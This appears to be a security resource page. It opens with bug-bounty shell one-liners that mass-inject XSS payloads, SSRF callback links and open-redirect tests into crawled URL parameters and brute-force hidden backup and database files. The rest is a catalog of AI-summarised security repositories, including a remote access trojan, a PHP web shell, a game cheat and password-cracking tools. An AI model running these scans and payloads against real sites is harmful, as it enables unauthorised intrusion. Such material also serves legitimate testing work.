cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain'

SSRF:

cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr

XSS:

Knoxss mass hunting

file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file

cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=alert(1)>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=alert(1)>"

cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe

echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht

cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl'

Hidden Dirs:

dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt

ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json

ffuf json to txt output

cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt

Search for Sensitive files from Wayback

onecli

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OneCLI is an open-source credential management gateway designed for AI agents, providing a secure method to store and inject API keys without exposing them to the agents themselves. It offers features such as AES-256-GCM encrypted secret storage, transparent credential injection, host and path matching for secret routing, and support for multiple agents with scoped permissions. The system enables easy setup via Docker and integrates with external vaults like Bitwarden for on-demand credential access, enhancing security and manageability in API interactions.

OneDorkForAll

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OneDorkForAll is an extensive compilation of Google dorks sourced from platforms such as Google, Shodan, and GitHub, specifically aimed at cybersecurity professionals and bug bounty hunters. It encompasses over 1 million dorks related to various vulnerabilities including LFI, SQL injection, and XSS, as well as job search techniques, and includes sensitive data reconnaissance methods for exposed configuration files, directories, and database files. Notably, it also includes dark web dorks for educational purposes, promoting responsible use of the information provided.

onedrive_user_enum

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: onedrive_user_enum is a tool designed for enumerating valid OneDrive users by leveraging the HTTP response codes from file share URLs. Its primary use case is passive user enumeration, which avoids direct login attempts, making it less detectable by the target organization. Notable features include options for remote logging to MySQL, local SQLite database support, user list truncation, and mechanisms for de-duplication and user list management.

README

onedrive_user_enum v2.10

enumerate valid onedrive users

OneListForAll

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OneListForAll is a web fuzzing tool that generates a variety of curated wordlists for penetration testing, focusing on efficiency and organization. Its notable features include automated synchronization of multiple source repositories, categorization of wordlists into short and long versions, deduplication, and a streamlined CLI for pipeline management. The tool consolidates wordlists into manageable files, supporting broad use cases from local fuzzing to advanced vulnerability assessments.

README

OneListForAll

Wordlists for web fuzzing: curated micro, categorized short/long, and combined final lists.

OnionSearch

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OnionSearch is a Python3 script designed for scraping URLs from various “.onion” search engines, facilitating access to hidden services on the Tor network. It supports multiple search engines and features options for proxy configuration, output file management, and multi-processing capabilities to enhance scraping efficiency. The tool is intended for educational use, enabling users to perform searches with customizable parameters while maintaining optimal performance.

README

OnionSearch

👋 Hi there! For any professional inquiries or collaborations, please reach out to me at: megadose@protonmail.com

open-semantic-search

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Open Semantic Search is an integrated search server and ETL framework designed for comprehensive document processing, including crawling, text extraction, text analysis, and named entity recognition—fully supporting various search functionalities such as fulltext, faceted, exploratory, and knowledge graph searches. Notable features include Docker container support, the ability to generate search user interfaces, and extensive automated testing capabilities, enabling seamless integration and deployment. This tool is particularly valuable for organizations needing robust, customizable search solutions across diverse data types and sources.

Open-Source-Security-Guide

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Open Source Security Guide serves as a comprehensive resource for enhancing the security of systems and networks by providing tutorials, standards, and tools relevant to open-source security practices. It includes sections on security certifications, threat models, and various security frameworks, along with a curated list of tools and resources to improve security operations. Notably, it aims to foster a collaborative environment for sharing best practices and advancing security through community initiatives.

openappsec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: open-appsec is a machine learning-based web application and API threat protection tool designed to guard against OWASP Top 10 vulnerabilities and zero-day attacks. It employs a dual-phase evaluation process using both supervised and unsupervised models to intelligently assess the legitimacy of HTTP requests based on user interaction patterns and predefined attack indicators. Notable features include support for deployment on Linux, Docker, and Kubernetes environments, along with flexible management options through declarative configuration, Helm charts, and a SaaS web interface.

openblack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: openblack is an open-source reimplementation of the classic game “Black & White” (2001), developed using modern C++ and contemporary rendering technologies like OpenGL and Vulkan. This tool primarily serves to allow users to experience the original gameplay while requiring the original game assets for operation. Noteworthy features include pre-built binaries for multiple platforms, including Windows, Linux, and macOS, along with experimental builds for additional architectures and devices.

README

openblack

opencve

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OpenCVE is a Vulnerability Intelligence Platform designed to efficiently monitor and manage Common Vulnerabilities and Exposures (CVEs). It provides features such as aggregation from multiple sources, customizable filtering, alert subscriptions, and collaboration tools for tracking CVE progress within teams. Notable functionalities include AI-driven enrichment, customizable dashboards, and detailed reporting capabilities to streamline vulnerability management processes.

README

What is OpenCVE?

OpenCVE is a Vulnerability Intelligence Platform that helps you monitor and manage CVEs efficiently.

opendbc

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: opendbc is a Python API designed for interacting with automotive systems, enabling the control of vehicle functions such as steering, gas, and brakes, as well as reading vehicle data like speed and steering angle. Its primary use case is to facilitate the development and integration of advanced driver-assistance systems (ADAS) using the openpilot platform, while also expanding into broader automotive management capabilities. Notable features include support for parsing and building CAN messages via DBC files, a repository of compatible vehicle models, and a structured approach for adding new vehicle support and functionalities.

openhaystack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OpenHaystack is a framework designed for tracking personal Bluetooth devices through Apple’s Find My network, enabling users to create custom tracking tags for various physical objects. It utilizes a macOS application and custom firmware for Bluetooth devices, allowing them to be discoverable by nearby iPhones that can report their location without requiring cellular coverage. Notably, OpenHaystack leverages reverse-engineering and security analysis of Apple’s offline finding features, though it remains experimental and untested.

OpenPods

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OpenPods is a free and open-source Android application designed for monitoring Apple AirPods connectivity and status. It features real-time notifications for connected AirPods, privacy-respecting functionality, and support for a dark theme, while being compatible with multiple generations of AirPods and Beats headphones. The tool explicitly violates Google Play policies, hence it is not intended for distribution on that platform.

README

OpenPods

The Free and Open Source app for monitoring your AirPods on Android

opensquat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: openSquat is an open-source intelligence (OSINT) tool designed to identify cyber squatting threats against brands or domains. It leverages advanced detection techniques, such as similarity detection using the Levenshtein distance algorithm, and integrates with services like VirusTotal for domain reputation checks. Key features include daily updates on newly registered domains, DNS validation, and multiple output formats, enhancing its utility for security professionals monitoring potential domain-related threats.

README

OpenTendo

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Open ‘Tendo is an open-source hardware project that recreates the original 1985 Front-Loading NES motherboard, focusing on documentation and preservation through reverse engineering. The repository provides comprehensive design files, including a bill of materials, schematics, and PCB layouts in KiCad format, while intentionally excluding modern video output improvements like RGB or HDMI. Users are encouraged to utilize the designs for personal projects, manufacturing replacement boards, or for further custom PCB work.

openwifipass

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OpenWifiPass is an open-source implementation of the grantor role in Apple’s Wi-Fi Password Sharing protocol, designed for sharing Wi-Fi credentials (SSID and PSK) using Bluetooth Low Energy on Linux systems like the Raspberry Pi. It serves educational and experimental purposes, featuring a simple command-line interface to initiate the sharing process, although it currently lacks identity verification for requestors, posing security risks when handling sensitive credentials. Notably, the project includes a reusable OPACK (de)serializer for handling packet data, emphasizing its experimental nature and community-driven development.

operative-framework

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Operative Framework is a digital investigation tool designed for interacting with multiple targets, executing a variety of modules, and managing links with these targets. Its notable features include the ability to export reports in PDF format, support for crafting custom modules, and a RESTful API for integration, all underpinned by a redesigned architecture in Rust for enhanced performance and functionality.

README

operative framework is a digital investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules.

OSCE3-Complete-Guide

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCE³ and OSEE Study Guide provides comprehensive resources for mastering web security concepts and techniques relevant to the Offensive Security Certified Expert (OSCE) and Offensive Security Exploitation Expert (OSEE) certifications. Its primary use case is to aid cybersecurity professionals in studying various attack vectors and methodologies, including but not limited to SQL injections, cross-site scripting, and remote code execution. Notable features include an extensive list of reference materials, as well as detailed discussions of numerous vulnerabilities and exploitation strategies.

OSCP

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCP Cheat Sheet repository provides a comprehensive collection of essential commands and techniques specifically tailored for the Offensive Security Certified Professional (OSCP) exam. It includes updates on advanced exploitation methods such as Active Directory Certificate Services abuse and Shadow Credentials attacks, alongside practical resources for information gathering, vulnerability analysis, and exploitation strategies. The tool aims to assist users in navigating the exam requirements while emphasizing the importance of adhering to current exam guidelines.

OSCP

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCP repository contains a collection of scripts and tools designed to assist in penetration testing and privilege escalation, particularly for the OSCP exam. Notable features include custom scripts for Linux privilege checks, port knocking, cron job analysis, and a comprehensive Windows privilege escalation check, along with a SQL injection cheatsheet for manual exploitation techniques. This repository is aimed at providing streamlined and efficient tools for security practitioners during their testing processes.

OSCP-Exam-Report-Template

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCP Exam Report Template provides structured templates for documenting OSCP Lab and Exam reports, designed to reduce the anxiety associated with report writing. Notable features include a detailed Table of Contents, machine-specific sections with links for easy navigation, and additional headers for crucial elements such as scan results and proof documentation. The template facilitates a comprehensive and organized representation of a penetration testing process following the OSCP guidelines.

OSCP-Exam-Report-Template-Markdown

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCP Exam Report Template in Markdown is designed to streamline the report writing process for Offensive Security exams, eliminating the need for traditional word processors like LaTeX and Microsoft Word. It allows users to write reports in Markdown, which enhances efficiency, reduces formatting issues, and integrates version control capabilities. Notable features include a script for automatic report generation, support for various text editors, and a clean, professional layout for certification documentation.

OSCP-Human-Guide

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSCP-Human-Guide is a personal guide tailored for preparing for the Offensive Security Certified Professional (OSCP) exam, featuring a collection of resources, strategies, and mock exam frameworks. Its primary use case is to assist aspiring penetration testers in navigating lab environments and exam simulations effectively. Notable features include detailed walkthroughs of lab machines, advice on exam preparation, and a CherryTree template for organization of findings.

README

OSCP-Human-Guide

Edit I’m currently moving all the OSCP stuff and other things to my “pentest-book”. This repository will not have more updates. Sorry for the inconvenience.

OSCP-Tricks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSCP Tricks is a comprehensive resource designed to assist penetration testers preparing for the Offensive Security Certified Professional (OSCP) exam. It encompasses various techniques across critical areas such as information gathering, web application attacks, privilege escalation on both Linux and Windows systems, and more, supplemented with external links to useful tutorials and methodologies. Notable features include categorized attack vectors, detailed enumeration guides, and checklists to streamline the penetration testing process.

osi.ig

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSI.IG is an open-source tool designed for conducting Open Source Intelligence (OSINT) on Instagram accounts by retrieving detailed user information, including profile data, hashtags, mentions, and post metadata. Notable features include the ability to extract user ID, follower counts, and engagement metrics, as well as accessing post details, although it currently struggles with posts marked as sensitive content. The tool aims to work without login credentials, providing a streamlined method for information gathering on Instagram profiles.

osint-brazuca

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSINT Brazuca is a comprehensive repository designed to aggregate open-source intelligence (OSINT) resources specifically relevant to Brazil. Its primary use case is to facilitate the gathering and analysis of publicly available information from various websites and portals, enhancing research and investigative efforts in fields like journalism and cybersecurity. Notable features include a structured collection of sources, adherence to legal guidelines such as the Brazilian General Data Protection Law (LGPD), and best practice recommendations for ethical information use.

osint-brazuca-regex

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSINT Brazuca Regex is a repository designed to compile an extensive set of regular expressions tailored for open-source intelligence (OSINT) purposes, specifically focusing on data pertinent to Brazil. It encompasses regex patterns for various categories such as personal identification documents, cryptocurrency wallets, and banking information, all provided in a convenient JSON format for easy integration into tools and scripts. Notable features include coverage of Brazilian documents like CPF and CNPJ, as well as generic regex applicable across different contexts.

OSINT-Cheat-sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSINT Cheat Sheet is a comprehensive resource that aggregates various open-source intelligence (OSINT) tools, datasets, and tips for effective information gathering. It serves as an educational guide, emphasizing safe usage practices and the importance of risk management when utilizing both free and paid tools. Notably, it includes advice on using virtual environments, enhancing privacy measures, and strategies for engaging with OSINT resources responsibly.

README

OSINT CHEAT SHEET - List OSINT Tools

OSINT-Framework

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSINT Framework is a comprehensive resource designed to assist users in gathering information from free online sources for open-source intelligence (OSINT) applications. Its primary use case is to facilitate the discovery of various tools and resources that aid in information security and beyond, while notable features include a structured categorization of tools, some requiring local installation, and links to Google Dorking resources. The framework encourages community contributions for expanding its database of OSINT resources.

osint-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSINT tools repository provides a comprehensive collection of 308 scripts and tools designed for Open Source Intelligence (OSINT) investigations. Users can select tools based on various input data types across numerous categories, including account identifiers, file types, and network analysis. Notable features include easy navigation through categorized tools and the ability to access the latest version of each tool by modifying the repository commit reference.

README

OSINT tools

Various OSINT tools and scripts, total 308 repos.

OSINT-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSINT-Tools is a curated collection of open-source intelligence (OSINT) tools aimed at facilitating the gathering and analysis of publicly available information. It includes a variety of tools for data extraction, reconnaissance, metadata analysis, and geolocation, with notable options like Maltego for link analysis, Recon-ng for web-based reconnaissance, and SpiderFoot for footprinting. The repository encourages contributions through pull requests, providing a collaborative platform for enhancing OSINT resources.

README

OSINT-Tools

:eyes: Some of my favorite OSINT tools.

Osintgram

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Osintgram is a Python-based OSINT tool designed for reconnaissance on Instagram, enabling users to collect and analyze public data from Instagram accounts by username. Key features include retrieving followers, followed accounts, post information, comments, captions, and downloading media such as photos and stories. The tool operates through an interactive shell, providing a comprehensive suite of commands for in-depth investigation while emphasizing the importance of ethical usage.

README

Osintgram 🔎📸

Osiris

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Osiris is a cross-platform game hacking tool designed for Counter-Strike 2, featuring a graphical user interface based on the game’s Panorama UI. Its primary use case is to enhance gameplay through various functions such as customizable visual indicators for bomb planting and inaccuracy visualizations without relying on traditional C++ runtime libraries or external dependencies. Notable features include customizable color schemes for game elements, enhanced player information rendering, and support for both Windows and Linux compilation.

osmedeus

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Osmedeus is a security-focused orchestration engine designed for automating complex workflows through declarative YAML definitions, enhancing the audibility and management of security tasks. It features distributed execution, a rich library of over 80 utility functions, and supports cloud infrastructure provisioning for robust penetration testing and scanning. Key functionalities include event-driven scheduling, agentic LLM integration for tool orchestration, and a REST API for seamless integration and visualization through a web interface.

ossa

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ossa is an open-source security architecture tool designed to assist small to medium-sized enterprises in implementing security measures through accessible tools and resources. Its primary use case is to guide users in the installation and practical application of various security tools to address common vulnerabilities and improve overall security posture. Notable features include a focus on application security fundamentals, intrusion detection, and detailed documentation on tool usage, aimed at enhancing security for organizations lacking dedicated security personnel.

osv-scanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: OSV-Scanner is a tool designed to identify vulnerabilities in project dependencies by leveraging the OSV database through a user-friendly CLI interface. It supports a diverse range of programming languages, package managers, and includes features such as vulnerability detection in container images and guided remediation recommendations based on various criteria. The tool’s extensibility and comprehensive data sourcing improve the accuracy and effectiveness of vulnerability notifications for developers.

README

osv.dev

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OSV.dev tool provides a platform for scanning software dependencies against a comprehensive database of known vulnerabilities. It features a Go-based scanner capable of analyzing various types of lockfiles, Docker containers, SBOMs, and git repositories, while enabling users to access a web UI and APIs for data integration and management. Notably, it includes tools for vulnerability data publishing, bisection, impact analysis, and leverages Google Cloud Platform for deployment and scalability.

OWASP-Web-Checklist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The OWASP Web Application Security Testing Checklist tool provides a comprehensive framework for evaluating the security posture of web applications through a series of structured assessments. Designed for security professionals, it covers multiple areas including information gathering, authentication, session management, and secure transmission, ensuring that all critical aspects of web application security are systematically addressed. Notable features include a user-friendly format available in both PDF and Docx, as well as a Trello board for effective task management and tracking.

p0wny-shell

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: p0wny@shell is a minimalistic, single-file PHP shell designed for executing commands on servers during penetration testing of PHP applications. Its primary use case involves remote command execution, featuring capabilities such as command history navigation, file name auto-completion, file upload and download, and remote file system navigation. Notably, it poses security risks if misused, and users are cautioned against deploying it on servers without adequate understanding.

README

p0wny@shell:~# – Single-file PHP Shell

panda

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PANDA is an open-source platform designed for architecture-neutral dynamic analysis, utilizing the QEMU whole system emulator to provide deep insights into code execution and data handling across various CPU architectures. It features capabilities for recording and replaying executions, allowing for compact and shareable replay logs, and supports a plugin architecture for enhanced code reusability in dynamic taint analysis and other complex analyses. The tool is developed in collaboration with academic institutions and is available as a Docker container as well as a Python interface for flexible integration into analysis workflows.

panopticon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Panopticon is a cross-platform disassembler designed for reverse engineering, capable of disassembling multiple instruction sets including AMD64, x86, AVR, and MOS 6502, as well as opening ELF files. Notable features include a Qt-based GUI for visualizing and annotating control flow graphs, though it has been deprecated with a migration to GitLab and restructuring into multiple crates. Users are encouraged to transition to the new version, Verso, for continued development and support.

papermario

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Paper Mario is an ongoing decompilation project aimed at recreating the original Paper Mario video game for multiple regions including US, JP, PAL, and iQue. The tool generates corresponding ROMs, providing a clear progress tracking system for each version. Notable features include a dedicated setup guide, active community support via Discord, and a public website for monitoring development progress.

README

Paper Mario

This is a work-in-progress decompilation of Paper Mario.

paradoxiaRAT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Paradoxia is a Remote Access Tool (RAT) designed for covert control of target systems, featuring a user-friendly console that allows users to easily build and deploy client applications. Notable capabilities include multithreading for multiple session management, full file access, keylogging, microphone recording, and remote execution commands, alongside stealth operation and persistent installation. This tool is intended for malicious use, as indicated by its detection as malware by security software.

ParamSpider

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ParamSpider is a tool designed for fetching and filtering URLs from Wayback Machine archives, specifically targeting domains for bug hunting, fuzzing, and further probing. Its notable features include the ability to ignore less relevant URLs, support for multiple domains, proxy configuration, and the option to introduce placeholders for parameter values, enhancing the efficiency of security assessments.

README

paramspider

Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing

📖 About • 🏗️ Installation • ⛏️ Usage • 🚀 Examples • 🤝 Contributing •

Passhunt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Passhunt is a tool designed to search for default credentials across network devices and web applications from a database of 523 vendors and 2084 default passwords. It facilitates quick access to these credentials through a simple command-line interface, allowing users to select vendors and retrieve associated default passwords efficiently. Notable features include the comprehensive vendor database and the ease of installation and usage with Python.

README

Passhunt

Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.

passphrase-wordlist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The passphrase-wordlist project provides an extensive list of over 20 million phrases paired with two hashcat rule files tailored for GPU-based password cracking. Its primary use case is to enhance the effectiveness of hashcat’s cracking capabilities by generating numerous permutations of passphrases to exploit vulnerabilities in systems that utilize weak or common passwords. Notable features include a robust wordlist sourced from various databases and dynamic updates, along with customizable rule files that manipulate passphrase formatting for improved cracking success.

PasswordPusher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Password Pusher is an open-source web application designed for securely sharing sensitive information such as passwords, notes, files, and URLs via self-destructing links. Its notable features include encrypted storage, customizable expiry controls, comprehensive audit logging, and the ability to self-host or utilize a hosted service, making it suitable for individual users and teams. The tool supports multiple languages and offers integrations through a JSON API and command-line interface, enhancing its versatility in secure information sharing.

patching

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Patching is a plugin for IDA Pro designed for interactive binary patching, aimed at enhancing the efficiency of malware analysis and software reverse engineering. It supports x86/x64 and Arm/Arm64 architectures, allowing users to edit assembly instructions in real-time, with visual feedback on the impact of their changes. Notable features include a context menu for quick patch actions, an intuitive assembly editing dialog, and the ability to NOP instructions or force conditional jumps swiftly.

pbtk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pbtk is a Protobuf toolkit designed to aid in the reverse engineering of applications utilizing the Protobuf serialization format. It features a unified GUI that enables users to extract Protobuf data structures from various implementations, including Android and web applications, and provides capabilities for editing, replaying, and fuzzing Protobuf messages sent to network endpoints. Notable features include comprehensive support for multiple Java runtimes and binary formats, along with a user-friendly interface that streamlines the manipulation of Protobuf messages.

PDBRipper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PDBRipper is a utility designed for extracting information from PDB (Program Database) files, primarily used in software development and reverse engineering. Notable features include a graphical user interface and console mode for flexibility, as well as support for building on Windows using Visual Studio and Qt. The tool facilitates in-depth analysis and manipulation of debugging information contained within PDB files.

README

PDBRipper

PDBRipper is an utility for extract an information from PDB-files.

pdfrip

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PDFRip is a multithreaded PDF password cracking tool written in Rust, featuring advanced capabilities such as wordlist attacks, custom query builders, and structured password brute-forcing techniques. Notable features include prepared verifier hot paths for efficient password attempts, exact progress tracking, checkpointing for session resumption, and output in JSON format for automation. It supports various brute-force methods, including bounded masks, date, and number generators, making it a versatile utility for recovering PDF passwords.

pe-bear

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PE-bear is a multiplatform reversing tool designed for analyzing PE (Portable Executable) files, focusing on providing a quick and flexible initial inspection for malware analysts. It supports handling malformed PE files and comes equipped with an updated signature database from PEiD, enhancing its detection capabilities. Additionally, PE-bear can be easily installed on various platforms, including Windows and Linux, and is compatible with multiple package managers.

README

PE-bear

pe-sieve

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PE-sieve is a lightweight malware detection tool that scans individual processes for malicious implants such as injected PEs, shellcodes, and various in-memory modifications. It effectively identifies techniques like Process Hollowing and Reflective DLL Injection, allowing for the extraction and analysis of detected threats. Additionally, PE-sieve can be integrated as a DLL with a simple API for use in other applications, enhancing its versatility in malware analysis workflows.

README

penelope

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Penelope is a modern shell handler designed to replace netcat for remote code execution (RCE) exploitation, focusing on enhancing post-exploitation workflows. It supports multiple listeners, session management, and dynamic interaction with target systems through modules, facilitating features such as file transfers, logging, and shell activity management. Built entirely in Python, it offers a standalone operation mode and compatibility across Unix-like systems, thereby streamlining the exploitation process for security professionals.

Penetration_Testing_POC

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Penetration_Testing_POC is a comprehensive collection of proof of concepts (POCs), scripts, tools, and articles related to penetration testing, intended to serve as a reference resource. It systematically categorizes vulnerabilities across various domains such as IoT, mobile devices, web applications, and privilege escalation methods, providing users with essential insights and practical exploitation techniques. Notable features include organized documentation and links to external resources, ensuring that users can easily navigate and leverage the provided information for security assessments.

penetration-testing-cheat-sheet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Penetration Testing Cheat Sheet is a comprehensive checklist designed to assist cybersecurity professionals in performing penetration testing tasks. It aggregates various tools and techniques for phases such as reconnaissance, scanning, and vulnerability exploitation, while emphasizing the importance of complementarity among tools for better results. Noteworthy features include automation of certain tasks and links to crucial resources for penetration testing methodologies.

README

Penetration Testing Cheat Sheet

This is more of a checklist for myself. May contain useful tips and tricks.

Penetration-Testing-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Penetration Testing Tools repository is a comprehensive collection of over 160 scripts, utilities, and cheatsheets designed for Penetration Testing and IT security audits. It encompasses a wide range of categories including cloud assessments, network protocols, web security, and red teaming, enabling practitioners to increase efficiency and improve technical assurance in their engagements. Notable features include modular organization by function, a focus on real-world applicability, and the absence of sensitive client-specific information.

pentagi

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PentAGI is an AI-powered penetration testing framework that automates security assessments for information security professionals and researchers. Notable features include a fully autonomous AI agent capable of executing penetration test steps, integration with over 20 professional tools, a smart memory system for storing results, and comprehensive monitoring and reporting capabilities. The tool operates within a secure Docker environment and includes a modern web interface along with APIs for automation and integration, making it a flexible solution for advanced cybersecurity testing.

pentest

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “pentest” tool is designed for network reconnaissance and vulnerability assessment, facilitating tasks such as ping sweeping and port scanning across specified IP ranges. It offers automation scripts for performing comprehensive scans and generating organized results, making it an essential utility for penetration testers and security professionals. Key features include various scanning scripts that leverage target lists for efficient and systematic reconnaissance operations.

README

So, You Want to be a Rock Star?

Follow instructions, it`s very easy!

$ git clone https://github.com/jivoi/pentest.git ./offsecfw && cd offsecfw
$ mix_ping_sweep.py 192.168.56.1-254 ./results
$ mix_port_scan.sh -t ./results/targets.txt -p all
$ mix_recon.py ./results/targets.txt

pentest-book

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Pentest Book is a comprehensive resource for penetration testers, offering a collection of information, scripts, and methodologies gathered during various pentests. It serves as a practical guide for conducting recon, exploring vulnerabilities in web and cloud services, and utilizing tools like Burp Suite, complemented by cheat sheets and checklists. Key features include easy navigation, a searchable interface, and continuous updates to ensure relevance and accuracy in the fast-evolving cybersecurity landscape.

pentest-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: pentest-tools is a collection of customizable security scripts designed for quick penetration testing needs, facilitating various tasks in security assessments. Notable features include domain enumeration, CORS vulnerability testing, subdomain extraction, and DNS requests handling, all provided in multiple programming languages such as Bash, Python, and PHP for versatile usability. This toolkit streamlines common pentesting workflows with efficient tools aimed at both novice and experienced security professionals.

README

pentest-tools

A collection of custom security tools for quick needs.

Pentest-Windows

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pentest-Windows11 v3.2 is a Windows penetration testing environment tailored for deployment on Mac M series chips and other platforms, integrating over 400 commonly used security tools and scripts. Notable features include support for multiple virtualization formats (VMware, Parallels Desktop, Hyper-V), optimized tool management, and a user-friendly interface, enabling efficient vulnerability assessment and penetration testing workflows. The environment is designed to be ready-to-use, allowing security professionals to conduct testing with minimal setup.

pentestagent

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: PentestAgent is an AI-driven penetration testing tool designed to assist cybersecurity professionals in conducting thorough security assessments. It features multiple operational modes, including single-task assistance, autonomous task execution, and multi-agent orchestration, allowing users to adapt their approach based on project complexity. The tool supports integration with platforms like OpenAI and Anthropic, and can be run in Docker for enhanced isolation and access to a suite of pre-installed pentesting tools.

PentestTools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Pentest Tools is a comprehensive catalog of penetration testing resources, referencing tools primarily from Kali Linux, and featuring both open-source and readily accessible software. It includes a wide array of categories such as information gathering, vulnerability analysis, and exploitation tools, aimed at facilitating various aspects of security assessments. Notable features include a curated list of essential tools, categorized functionalities, and a long-term commitment to updates and supplementary resources.

personal-security-checklist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: 🔒 A compiled checklist of 300+ tips for protecting digital security and privacy in 2026

🔒 A compiled checklist of 300+ tips for protecting digital security and privacy in 2026

